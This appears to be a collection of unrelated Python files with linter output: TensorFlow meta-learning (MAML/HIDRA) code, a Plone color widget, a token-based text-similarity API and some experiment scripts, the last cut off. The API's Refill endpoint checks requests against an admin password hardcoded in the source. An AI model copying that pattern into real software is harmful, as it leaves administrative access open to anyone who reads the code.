1 import numpy as np 2 import tensorflow as tf 3 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen 4 5 def test(m, data_sampler, 6 eval_step, 7 min_classes, 8 max_classes, 9 train_shots, 10 test_shots, 11 meta_batch, 12 meta_iters, 13 name): 14 15 sess = tf.Session() 16 sess.run(tf.global_variables_initializer()) 17 losses=[] 18 19 temp_yp = [] 20 aps = [] 21 buffer = [] 22 lossesB=[] 23 24 train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test") 25 print("TEST MODE") 26 m.loadWeights(sess, name, step = str(int(eval_step)), model_name=name+".ckpt") 27 for i in range(meta_iters): 28 xb1,yb1,xb2,yb2 = next(train_gen) 29 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] 30 31 if m.maml_n == 2: 32 sess.run(m.init_assign, feed_dict={m.label_n:[5]}) 33 l,vals,ps=sess.run([m.test_train_loss,m.test_val_losses,m.val_predictions],feed_dict={m.train_xb: xb1, 34 m.train_yb: yb1, 35 m.val_xb:xb2, 36 m.val_yb:yb2, 37 m.label_n:num_l}) 38 39 losses.append(vals) 40 lossesB.append(vals) 41 buffer.append(l) 42 43 true_vals = np.argmax(yb2,axis=-1) 44 all_accs = [] 45 for pred_epoch in range(len(ps)): 46 all_accs.append(np.mean(np.argmax(ps[pred_epoch],axis=-1)==true_vals)) 47 temp_yp.append(all_accs) 48 49 50 # if i%1==0: 51 if i%50==0: 52 print(f"({i}/{meta_iters})") 53 print(f"Final: TLoss {np.mean(buffer)}, VLoss {np.mean(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}" ) 54 print(f"Final: TLoss {np.mean(buffer)}-{np.std(buffer)}, VLoss {np.mean(lossesB,axis=0)}-{np.std(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}-{np.std(temp_yp,axis=0)}" ) 55
46 - warning: bad-indentation 5 - refactor: too-many-arguments 5 - refactor: too-many-positional-arguments 5 - refactor: too-many-locals 20 - warning: unused-variable 3 - warning: unused-import 3 - warning: unused-import 3 - warning: unused-import
1 ## Created by Rafael Rego Drumond and Lukas Brinkmeyer 2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow 3 4 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen 5 from archs.fcn import Model as mfcn 6 from archs.hydra import Model as mhyd 7 from train import * 8 from test import * 9 from args import argument_parser, train_kwargs, test_kwargs 10 import random 11 12 args = argument_parser().parse_args() 13 random.seed(args.seed) 14 t_args = train_kwargs(args) 15 e_args = test_kwargs (args) 16 17 print("########## argument sheet ########################################") 18 for arg in vars(args): 19 print (f"#{arg:>15} : {str(getattr(args, arg))} ") 20 print("##################################################################") 21 22 print("Loading Data...") 23 if args.dataset in ["Omniglot", "omniglot", "Omni", "omni"]: 24 loader = OmniChar_Gen (args.data_path) 25 isMIN = False 26 shaper = [28,28,1] 27 elif args.dataset in ["miniimagenet", "MiniImageNet", "mini"]: 28 loader = MiniImgNet_Gen(args.data_path) 29 isMIN = True 30 shaper = [84,84,3] 31 else: 32 raise ValueError("INVALID DATA-SET NAME!") 33 34 print("Building Model...") 35 if args.arch == "fcn"or args.arch == "maml": 36 print("SELECTED: MAML") 37 m = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) 38 mt = mfcn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) 39 #elif args.arch == "rnn": 40 # m = mrnn (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.min_classes) 41 elif args.arch == "hydra" or args.arch == "hidra": 42 print("SELECTED: HIDRA") 43 m = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) 44 mt = mhyd (meta_lr = args.meta_step, train_lr = args.learning_rate, image_shape=shaper, isMIN=isMIN, label_size=args.max_classes) 45 else: 46 raise ValueError("INVALID Architecture NAME!") 47 48 mode = "train" 49 if args.test: 50 mode = "test" 51 print("Starting Test Step...") 52 mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode=mode) 53 test (mt, loader, **e_args) 54 else: 55 modeltest = None 56 if args.testintrain: 57 mt.build (K = args.test_inner_K, meta_batchsz = args.meta_batch, mode="test") 58 modeltest = mt 59 print("Starting Train Step...") 60 m.build (K = args.train_inner_K, meta_batchsz = args.meta_batch, mode=mode) 61 train(m, modeltest, loader, **t_args)
7 - warning: wildcard-import 8 - warning: wildcard-import 35 - refactor: consider-using-in 41 - refactor: consider-using-in 53 - error: undefined-variable 61 - error: undefined-variable 4 - warning: unused-import
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer 2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow 3 4 import os 5 import numpy as np 6 import tensorflow as tf 7 8 class MAML: 9 def __init__(self,train_lr,meta_lr,image_shape, isMIN, label_size=2): 10 self.train_lr = train_lr 11 self.meta_lr = meta_lr 12 self.image_shape = image_shape 13 self.isMIN = isMIN 14 self.saver = None 15 self.label_size = label_size 16 self.finals = 64 17 self.maml_n = 1 18 if isMIN: 19 self.finals = 800 20 def build(self, K, meta_batchsz, mode='train'): 21 22 # Meta batch of tasks 23 self.train_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]]) 24 self.train_yb = tf.placeholder(tf.float32, [None,None,None]) 25 self.val_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]]) 26 self.val_yb = tf.placeholder(tf.float32, [None,None,None]) 27 self.label_n = tf.placeholder(tf.int32 , 1, name="num_labs") 28 #Initialize weights 29 self.weights, self.cells = self.dense_weights() 30 training = True if mode is 'train' else False 31 32 # Handle one task update 33 def meta_task(inputs): 34 train_x, train_y, val_x, val_y = inputs 35 val_preds, val_losses = [], [] 36 37 train_pred = self.forward(train_x, self.weights, training) 38 train_loss = tf.losses.softmax_cross_entropy(train_y,train_pred) 39 40 grads = tf.gradients(train_loss, list(self.weights.values())) 41 gvs = dict(zip(self.weights.keys(), grads)) 42 43 a=[self.weights[key] - self.train_lr * gvs[key] for key in self.weights.keys()] 44 # for key in self.weights.keys(): 45 # print(key, gvs[key]) 46 fast_weights = dict(zip(self.weights.keys(),a)) 47 48 # Validation after each update 49 val_pred = self.forward(val_x, fast_weights, training) 50 val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred) 51 # record T0 pred and loss for meta-test 52 val_preds.append(val_pred) 53 val_losses.append(val_loss) 54 55 # continue to build T1-TK steps graph 56 for _ in range(1, K): 57 58 # Update weights on train data of task t 59 loss = tf.losses.softmax_cross_entropy(train_y,self.forward(train_x, fast_weights, training)) 60 grads = tf.gradients(loss, list(fast_weights.values())) 61 gvs = dict(zip(fast_weights.keys(), grads)) 62 fast_weights = dict(zip(fast_weights.keys(), [fast_weights[key] - self.train_lr * gvs[key] for key in fast_weights.keys()])) 63 64 # Evaluate validation data of task t 65 val_pred = self.forward(val_x, fast_weights, training) 66 val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred) 67 val_preds.append(val_pred) 68 val_losses.append(val_loss) 69 70 result = [train_pred, train_loss, val_preds, val_losses] 71 72 return result 73 74 out_dtype = [tf.float32, tf.float32,[tf.float32] * K, [tf.float32] * K] 75 result = tf.map_fn(meta_task, elems=(self.train_xb, self.train_yb, self.val_xb, self.val_yb), 76 dtype=out_dtype, parallel_iterations=meta_batchsz, name='map_fn') 77 train_pred_tasks, train_loss_tasks, val_preds_tasks, val_losses_tasks = result 78 79 if mode is 'train': 80 self.train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz 81 self.val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)] 82 self.val_predictions = val_preds_tasks 83 84 optimizer = tf.train.AdamOptimizer(self.meta_lr, name='meta_optim') 85 gvs = optimizer.compute_gradients(self.val_losses[-1]) 86 gvs = [(tf.clip_by_norm(grad, 10), var) for grad, var in gvs] 87 self.meta_op = optimizer.apply_gradients(gvs) 88 89 else: 90 self.test_train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz 91 self.test_val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)] 92 self.val_predictions = val_preds_tasks 93 94 self.saving_weights = tf.trainable_variables() 95 def conv_layer(self, x, W, b, name, strides=1): 96 with tf.variable_scope(name,reuse=tf.AUTO_REUSE): 97 x = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME') 98 x = tf.nn.bias_add(x, b) 99 return x 100 101 def fc_layer(self,x, name, weights=None, biases=None): 102 with tf.variable_scope(name,reuse=tf.AUTO_REUSE): 103 fc = tf.matmul(x, weights) 104 fc = tf.nn.bias_add(fc, biases) 105 return fc 106 107 def loadWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'): 108 if self.saver == None: 109 z = self.saving_weights 110 #print("KEYS:", z.keys()) 111 self.saver = tf.train.Saver(var_list=z, max_to_keep=12) 112 saver = self.saver 113 checkpoint_path = modeldir + f"{name}/"+model_name +"-" + step 114 if os.path.isfile(checkpoint_path+".marker"): 115 saver.restore(sess, checkpoint_path) 116 print('The checkpoint has been loaded.') 117 else: 118 print(checkpoint_path+".marker not found. Starting from scratch.") 119 120 def saveWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'): 121 if self.saver == None: 122 z = self.saving_weights 123 self.saver = tf.train.Saver(var_list=z, max_to_keep=12) 124 saver = self.saver 125 checkpoint_path = modeldir + f"{name}/"+model_name 126 if not os.path.exists(modeldir): 127 os.makedirs(modeldir) 128 saver.save(sess, checkpoint_path, global_step=step) 129 print('The checkpoint has been created.') 130 open(checkpoint_path+"-"+str(int(step))+".marker", 'a').close() 131 132 133 def dense_weights(self): 134 return 135 def forward(self,x,weights, training): 136 return
103 - warning: bad-indentation 104 - warning: bad-indentation 105 - warning: bad-indentation 8 - refactor: too-many-instance-attributes 9 - refactor: too-many-arguments 9 - refactor: too-many-positional-arguments 20 - refactor: too-many-locals 29 - error: assignment-from-none 29 - error: unpacking-non-sequence 30 - refactor: simplifiable-if-expression 30 - refactor: literal-comparison 33 - refactor: too-many-locals 37 - error: assignment-from-none 49 - error: assignment-from-none 65 - error: assignment-from-none 79 - refactor: literal-comparison 77 - warning: unused-variable 80 - warning: unused-variable 81 - warning: unused-variable 95 - refactor: too-many-arguments 95 - refactor: too-many-positional-arguments 95 - warning: unused-argument 107 - refactor: too-many-arguments 107 - refactor: too-many-positional-arguments 120 - refactor: too-many-arguments 120 - refactor: too-many-positional-arguments 130 - refactor: consider-using-with 130 - warning: unspecified-encoding 135 - warning: unused-argument 135 - warning: unused-argument 135 - warning: unused-argument 23 - warning: attribute-defined-outside-init 24 - warning: attribute-defined-outside-init 25 - warning: attribute-defined-outside-init 26 - warning: attribute-defined-outside-init 27 - warning: attribute-defined-outside-init 29 - warning: attribute-defined-outside-init 29 - warning: attribute-defined-outside-init 80 - warning: attribute-defined-outside-init 81 - warning: attribute-defined-outside-init 82 - warning: attribute-defined-outside-init 92 - warning: attribute-defined-outside-init 87 - warning: attribute-defined-outside-init 90 - warning: attribute-defined-outside-init 91 - warning: attribute-defined-outside-init 94 - warning: attribute-defined-outside-init 5 - warning: unused-import
1 import numpy as np 2 import tensorflow as tf 3 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen 4 import time 5 6 def train( m, mt, # m is the model foir training, mt is the model for testing 7 data_sampler, # Creates the data generator for training and testing 8 min_classes, # minimum amount of classes 9 max_classes, # maximum || || || 10 train_shots, # number of samples per class (train) 11 test_shots, # number of samples per class (test) 12 meta_batch, # Number of tasks 13 meta_iters, # Number of iterations 14 test_iters, # Iterations in Test 15 train_step, 16 name): # Experiment name for experiments 17 18 sess = tf.Session() 19 sess.run(tf.global_variables_initializer()) 20 # bnorms = [v for v in tf.global_variables() if "bn" in v.name] 21 #---------Performance Tracking lists--------------------------------------- 22 losses = [] 23 temp_yp = [] 24 temp_ypn= [] 25 nls = [] 26 aps = [] 27 buffer = [] 28 lossesB = [] 29 #-------------------------------------------------------------------------- 30 31 #---------Load train and test data-sets------------------------------------ 32 train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"train") 33 if mt is not None: 34 test_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test" ) 35 m.loadWeights(sess, name, step=str(int(train_step)), model_name=name+".ckpt") 36 #-------------------------------------------------------------------------- 37 38 #TRAIN LOOP 39 print("Starting meta training:") 40 start = time.time() 41 for i in range(meta_iters): 42 43 xb1,yb1,xb2,yb2 = next(train_gen) 44 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] 45 46 if m.maml_n == 2: # in case it uses hydra master node, it should re-assign the output nodes from the master 47 sess.run(m.init_assign, feed_dict={m.label_n:[5]}) 48 l,_,vals,ps=sess.run([m.train_loss,m.meta_op,m.val_losses,m.val_predictions],feed_dict={m.train_xb: xb1, 49 m.train_yb: yb1, 50 m.val_xb:xb2, 51 m.val_yb:yb2, 52 m.label_n:num_l}) 53 if m.maml_n == 2: # in case it uses hydra master node, it should update the master 54 sess.run(m.final_assign,feed_dict={m.label_n:num_l}) 55 56 losses.append(vals) 57 lossesB.append(vals) 58 buffer.append(l) 59 60 #Calculate accuaracies 61 aux = [] 62 tmp_pred = np.argmax(np.reshape(ps[-1],[-1,num_l[0]]),axis=-1) 63 tmp_true = np.argmax(np.reshape(yb2,[-1,num_l[0]]),axis=-1) 64 for ccci in range(num_l[0]): 65 tmp_idx = np.where(tmp_true==ccci)[0] 66 #print(tmp_idx) 67 aux.append(np.mean(tmp_pred[tmp_idx]==tmp_true[tmp_idx])) 68 temp_yp.append(np.mean(tmp_pred==tmp_true)) 69 temp_ypn.append(aux) 70 71 #EVALUATE and PRINT 72 if i%100==0: 73 testString = "" 74 #If we give a test model, it will test using the weights from train 75 if mt is not None and i%1000==0: 76 lossestest = [] 77 buffertest = [] 78 lossesBtest = [] 79 temp_yptest = [] 80 for z in range(100): 81 if m.maml_n == 2: 82 sess.run(mt.init_assign, feed_dict={mt.label_n:[5]}) 83 xb1,yb1,xb2,yb2 = next(test_gen) 84 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] 85 l,vals,ps=sess.run([mt.test_train_loss,mt.test_val_losses,mt.val_predictions],feed_dict={mt.train_xb: xb1, 86 mt.train_yb: yb1, 87 mt.val_xb:xb2, 88 mt.val_yb:yb2, 89 mt.label_n:num_l}) 90 lossestest.append(vals) 91 lossesBtest.append(vals) 92 buffertest.append(l) 93 temp_yptest.append(np.mean(np.argmax(ps[-1],axis=-1)==np.argmax(yb2,axis=-1))) 94 95 testString = f"\n TEST: TLoss {np.mean(buffertest):.3f} VLoss {np.mean(lossesBtest,axis=0)[-1]:.3f}, ACCURACY {np.mean(temp_yptest):.4f}" 96 print(f"Epoch {i}: TLoss {np.mean(buffer):.4f}, VLoss {np.mean(lossesB,axis=0)[-1]:.4f},", 97 f"Accuracy {np.mean(temp_yp):.4}", f", Per label acc: {[float('%.4f' % elem) for elem in aux]}", f"Finished in {time.time()-start}s",testString) 98 99 buffer = [] 100 lossesB = [] 101 temp_yp = [] 102 start = time.time() 103 # f"\n TRUE: {yb2}\n PRED: {ps}") 104 if i%5000==0: 105 print("Saving...") 106 m.saveWeights(sess, name, i, model_name=name+".ckpt") 107 108 m.saveWeights(sess, name, i, model_name=name+".ckpt")
6 - refactor: too-many-arguments 6 - refactor: too-many-positional-arguments 6 - refactor: too-many-locals 83 - error: possibly-used-before-assignment 6 - refactor: too-many-statements 14 - warning: unused-argument 25 - warning: unused-variable 26 - warning: unused-variable 80 - warning: unused-variable 3 - warning: unused-import 3 - warning: unused-import 3 - warning: unused-import
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer 2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow 3 4 import numpy as np 5 import tensorflow as tf 6 from archs.maml2 import MAML 7 def getBin(l=10): 8 x_ = 2 9 n = 1 10 while x_ < l: 11 x_ = x_* 2 12 n += 1 13 14 numbers = [] 15 for i in range(l): 16 num = [] 17 for j in list('{0:0b}'.format(i+1).zfill(n)): 18 num.append(int(j)) 19 numbers.append(num) 20 return numbers 21 class Model(MAML): 22 def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2): 23 super().__init__(train_lr,meta_lr,image_shape,isMIN, label_size) 24 self.finals = 64 25 if isMIN: 26 self.finals = 800 27 def getBin(self, l=10): 28 x_ = 2 29 n = 1 30 while x_ < l: 31 x_ = x_* 2 32 n += 1 33 34 numbers = [] 35 for i in range(l): 36 num = [] 37 for j in list('{0:0b}'.format(i+1).zfill(n)): 38 num.append(int(j)) 39 numbers.append(num) 40 return numbers 41 42 def dense_weights(self): 43 weights = {} 44 cells = {} 45 initializer = tf.contrib.layers.xavier_initializer() 46 divider = 1 47 inic = 1 48 filters = 64 49 self.finals = 64 50 if self.isMIN: 51 print("\n\n\n\n\n\n\n\n\nIS MIN\n\n\n\n\n\n\n\n\n\n\n") 52 divider = 2 53 inic = 3 54 self.finals = 800 55 filters = 32 56 with tf.variable_scope('MASTER', reuse= tf.AUTO_REUSE): 57 cells['d_1'] = tf.get_variable('MASTER_d_1w', [self.finals,1], initializer = initializer) 58 cells['b_1'] = tf.get_variable('MASTER_d_1b', [1], initializer=tf.initializers.constant) 59 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): 60 weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer) 61 weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer) 62 weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer) 63 weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer) 64 weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant) 65 weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant) 66 weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant) 67 weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant) 68 for i in range (self.max_labels): 69 weights['d_1w'+str(i)] = tf.get_variable('d_1w'+str(i), [self.finals,1], initializer = initializer) 70 weights['b_1w'+str(i)] = tf.get_variable('d_1b'+str(i), [1], initializer=tf.initializers.constant) 71 72 73 return weights, cells 74 75 def forward(self,x,weights, training): 76 # with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): 77 conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1") 78 conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE) 79 conv1 = tf.nn.relu(conv1) 80 conv1 = tf.layers.MaxPooling2D(2,2)(conv1) 81 82 conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2") 83 conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE) 84 conv2 = tf.nn.relu(conv2) 85 conv2 = tf.layers.MaxPooling2D(2,2)(conv2) 86 87 conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3") 88 conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE) 89 conv3 = tf.nn.relu(conv3) 90 conv3 = tf.layers.MaxPooling2D(2,2)(conv3) 91 92 conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4") 93 conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE) 94 conv4 = tf.nn.relu(conv4) 95 conv4 = tf.layers.MaxPooling2D(2,2)(conv4) 96 97 bn = tf.layers.Flatten()(conv4) 98 99 agg = [self.fc_layer(bn,"dense"+str(i),weights["d_1w"+str(i)],weights["b_1w"+str(i)]) for i in range(self.max_labels)] 100 fc1 = tf.concat(agg, axis=-1)[:,:self.label_n[0]] 101 102 return fc1
22 - refactor: too-many-arguments 22 - refactor: too-many-positional-arguments 46 - warning: unused-variable 75 - warning: unused-argument 4 - warning: unused-import
1 from Products.Archetypes.public import StringWidget 2 from Products.Archetypes.Registry import registerWidget 3 4 class ColorWidget(StringWidget): 5 _properties = StringWidget._properties.copy() 6 _properties.update({ 7 'macro' : "colorchooser", 8 }) 9 10 11 registerWidget(ColorWidget, 12 title='Color', 13 description='Like StringWidget, stores the hex value of a color.', 14 used_for=('Products.Archetypes.Field.StringField',) 15 ) 16 17 18 from Products.validation import validation 19 from Products.validation.validators import RegexValidator 20 validation.register(RegexValidator('isHexColor', r'^[0-9a-fA-F]{6}$', title='', description='', 21 errmsg='is not a hexadecimal color code.')) 22
4 - refactor: too-few-public-methods
1 # importing libraries 2 from sys_utils import * 3 4 # Resource refill 5 """ 6 Resource Refill takes input on a POST protocol and adds to the existing tokens 7     Parameters: 8      namepassref: contains username, admin password and refill amount <JSON> 9     Returns: 10         retJson: contains status code and message <JSON> 11 """ 12 class Refill(Resource): 13 def post(self): 14 namepassref = request.get_json() 15 username = namepassref["username"] 16 admin_password = namepassref["admin_password"] 17 refill_amt = namepassref["refill_amt"] 18 19 if not userExists(username): 20 retJson = { 21 "statuscode" : 301, 22 "message" : "User does not exit" 23 } 24 return jsonify(retJson) 25 26 correct_admin_password = "Admiral123" 27 28 if not correct_admin_password == admin_password: 29 retJson = { 30 "statuscode" : 304, 31 "message" : "Invalid admin password" 32 } 33 return jsonify(retJson) 34 35 num_tokens = countTokens(username) 36 37 users.update({ 38 "username":username, 39 }, 40 { 41 "$set": { 42 "tokens" : num_tokens + refill_amt 43 } 44 } 45 ) 46 47 retJson = { 48 "statuscode" : 200, 49 "message" : "Tokens refilled successfully" 50 } 51 return jsonify(retJson)
2 - warning: wildcard-import 5 - warning: pointless-string-statement 12 - error: undefined-variable 14 - error: undefined-variable 19 - error: undefined-variable 24 - error: undefined-variable 33 - error: undefined-variable 35 - error: undefined-variable 37 - error: undefined-variable 51 - error: undefined-variable 12 - refactor: too-few-public-methods
1 # importing libraries 2 from sys_utils import * 3 4 # Resource Detect 5 """ 6 Resource Detect takes input on a POST protocol and returns similarity ratio 7     Parameters: 8      namepassimg: contains username, password of the user and two string documents <JSON> 9     Returns: 10         retJson: contains status code and message <JSON> 11 """ 12 class Detect(Resource): 13 def post(self): 14 namepasstext = request.get_json() 15 username = namepasstext["username"] 16 password = namepasstext["password"] 17 text1 = namepasstext["text1"] 18 text2 = namepasstext["text2"] 19 20 if not userExists(username): 21 retJson = { 22 "statuscode" : 301, 23 "message" : "User does not exit" 24 } 25 return jsonify(retJson) 26 27 correct_pw = verifypw(username, password) 28 if not correct_pw: 29 retJson = { 30 "statuscode" : 302, 31 "message" : "Invalid password" 32 } 33 return jsonify(retJson) 34 35 num_tokens = countTokens(username) 36 if num_tokens <= 0 : 37 retJson = { 38 "statuscode" : 303, 39 "message" : "Out of tokens, please refill" 40 } 41 return jsonify(retJson) 42 43 # calculate edit distance. We use the pretained spacy model to predict the similarity of two strings goven to us 44 nlp = spacy.load('en_core_web_sm') # loaded the spacy model 45 46 text1 = nlp(text1) # change from string to natural language processing model sentence 47 text2 = nlp(text2) 48 49 # ratio of similarity between 0 and 1 for the text1 and text2. closer the one, more the similarity 50 # 0 = text1 and text2 are very different and 1 = text1 and text2 are almost or entirely similar 51 52 ratio = text1.similarity(text2) 53 54 retJson = { 55 "statuscode" : 200, 56 "message" : "Similarity ration calculated", 57 "similarity ratio" : ratio 58 } 59 60 users.update({ 61 "username":username, 62 }, 63 { 64 "$set": { 65 "tokens" : num_tokens -1 66 } 67 } 68 ) 69 return jsonify(retJson)
2 - warning: wildcard-import 5 - warning: pointless-string-statement 12 - error: undefined-variable 14 - error: undefined-variable 20 - error: undefined-variable 25 - error: undefined-variable 27 - error: undefined-variable 33 - error: undefined-variable 35 - error: undefined-variable 41 - error: undefined-variable 44 - error: undefined-variable 60 - error: undefined-variable 69 - error: undefined-variable 12 - refactor: too-few-public-methods
1 # importing libraries 2 from sys_utils import * 3 4 # Resource Register 5 """ 6 Resource Register takes input on a POST protocol and creates new accounts 7     Parameters: 8      namepass: contains username and password of the user <JSON> 9     Returns: 10         retJson: contains status code and message <JSON> 11 """ 12 class Register(Resource): 13 def post(self): 14 namepass = request.get_json() 15 username = namepass["username"] 16 password = namepass["password"] 17 18 # check if the user already exists 19 if userExists(username): 20 retJson = { 21 "statuscode" : 301, 22 "message" : "User Already exists" 23 } 24 return jsonify(retJson) 25 26 hashedpw = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt()) 27 users.insert({ 28 "username" : username, 29 "password" : hashedpw, 30 "tokens" : 6 31 }) 32 retJson = { 33 "statuscode" : 200, 34 "message" : "you successfuly signed up for the api" 35 } 36 return jsonify(retJson)
2 - warning: wildcard-import 5 - warning: pointless-string-statement 12 - error: undefined-variable 14 - error: undefined-variable 19 - error: undefined-variable 24 - error: undefined-variable 26 - error: undefined-variable 26 - error: undefined-variable 27 - error: undefined-variable 36 - error: undefined-variable 12 - refactor: too-few-public-methods
1 import pandas as pd 2 import numpy as np 3 from mpl_toolkits.mplot3d import Axes3D 4 import matplotlib.pyplot as plt 5 from matplotlib import cm 6 7 8 def univariant(df, param, quantity='mean_test_score'): 9 unique = df[param].unique() 10 scores = [] 11 for i in unique: 12 scores.append(df[df[param] == i][quantity].mean()) 13 14 plt.plot(unique, scores) 15 plt.show() 16 17 18 def multivariant(df, param1, param2,quantity='mean_test_score'): 19 unique1 = df[param1].unique() 20 unique2 = df[param2].unique() 21 unique1, unique2 = np.meshgrid(unique1, unique2) 22 scores = np.zeros(unique1.shape) 23 24 for i, p1 in enumerate(unique1[0]): 25 for j, p2 in enumerate(unique2[0]): 26 scores[i, j] = df[(df[param1] == p1) & (df[param2] == p2)][quantity].values.mean() 27 28 fig = plt.figure() 29 ax = fig.gca(projection='3d') 30 31 surf = ax.plot_surface(unique1, unique2, scores, cmap=cm.coolwarm, linewidth=0, antialiased=False) 32 ax.set_xlabel(param1) 33 ax.set_ylabel(param2) 34 ax.set_zlabel("Accuracy") 35 plt.show() 36 37 38 df = pd.read_csv("..\\results\\cnn.csv") 39 univariant(df, param='param_cnn__len_filter',quantity='mean_score_time')
8 - warning: redefined-outer-name 18 - warning: redefined-outer-name 31 - warning: unused-variable 3 - warning: unused-import
1 from alpaca import Alpaca 2 from utils import to_time_series_dataset, split_df, TimeSeriesResampler, confusion_matrix 3 from sklearn.model_selection import train_test_split 4 from sklearn.utils import shuffle 5 from sklearn.pipeline import Pipeline 6 import time 7 import numpy as np 8 import pandas as pd 9 10 # Variables 11 repetitions = 2 12 13 if __name__ == "__main__": 14 15 # For both datasets 16 for dataset in ['uc1']: 17 print("Dataset: ", dataset) 18 19 results = [] 20 #timing = [] 21 #outliers = [] 22 23 if dataset == 'uc1': 24 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), 25 index_column='run_id', 26 feature_columns=['fldPosition', 'fldCurrent'], 27 target_name='target') 28 # Length of timeseries for resampler and cnn 29 sz = [38,41] 30 # Number of channels for cnn 31 num_channels = len(X[0][0]) 32 # Number of classes for cnn 33 num_classes = np.unique(y).shape[0] 34 35 elif dataset == 'uc2': 36 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), 37 index_column='run_id', 38 feature_columns=['position', 'force'], 39 target_name='label') 40 # Length of timeseries for resampler and cnn 41 sz = [200] 42 # Number of channels for cnn 43 num_channels = len(X[0][0]) 44 # Number of classes for cnn 45 num_classes = np.unique(y).shape[0] 46 47 # For each repetition 48 for r in range(repetitions): 49 print("Repetition #", r) 50 # For each resampling length 51 for s in sz: 52 print("Resampling size:", s) 53 t_start = time.time() 54 # Shuffle for Keras 55 X, y = shuffle(X, y, random_state=r) 56 # Turn y to numpy array 57 y = np.array(y) 58 # Split into train and test sets 59 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r) 60 61 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=s)), 62 ('classifier', Alpaca())]) 63 alpaca.fit(X_train, y_train, classifier__stacked=False, classifier__n_clusters=200) 64 65 # Prediction 66 y_pred_bin, y_pred = alpaca.predict(X_test, voting="veto") 67 y_test_bin = np.copy(y_test) 68 y_test_bin[y_test_bin > 0] = 1 69 70 # BINARY RESULTS (AD + ENSEMBLE) 71 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel() 72 # Append overall error 73 results.append([s, r, 'err_bin', (fp + fn) / (tn + fp + fn + tp)]) 74 # Append false negative rate 75 results.append([s, r, 'fnr_bin', fn / (fn + tp)]) 76 # Append false positive rate 77 results.append([s, r, 'fpr_bin', fp / (fp + tn)]) 78 79 # CLASSIFIER RESULTS 80 y_pred_clf = np.copy(y_pred) 81 y_pred_clf[y_pred_clf != 0] = 1 # Also turn classifier predictions to binary for cfm 82 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_clf).ravel() 83 # Append overall error 84 results.append([s, r, 'err_ens', (fp + fn) / (tn + fp + fn + tp)]) 85 # Append false negative rate 86 results.append([s, r, 'fnr_ens', fn / (fn + tp)]) 87 # Append false positive rate 88 results.append([s, r, 'fpr_ens', fp / (fp + tn)]) 89 """ 90 # TIMING 91 sample = np.transpose(to_time_series_dataset(X_test[0]), (2, 0, 1)) 92 start = time.time() 93 for i in 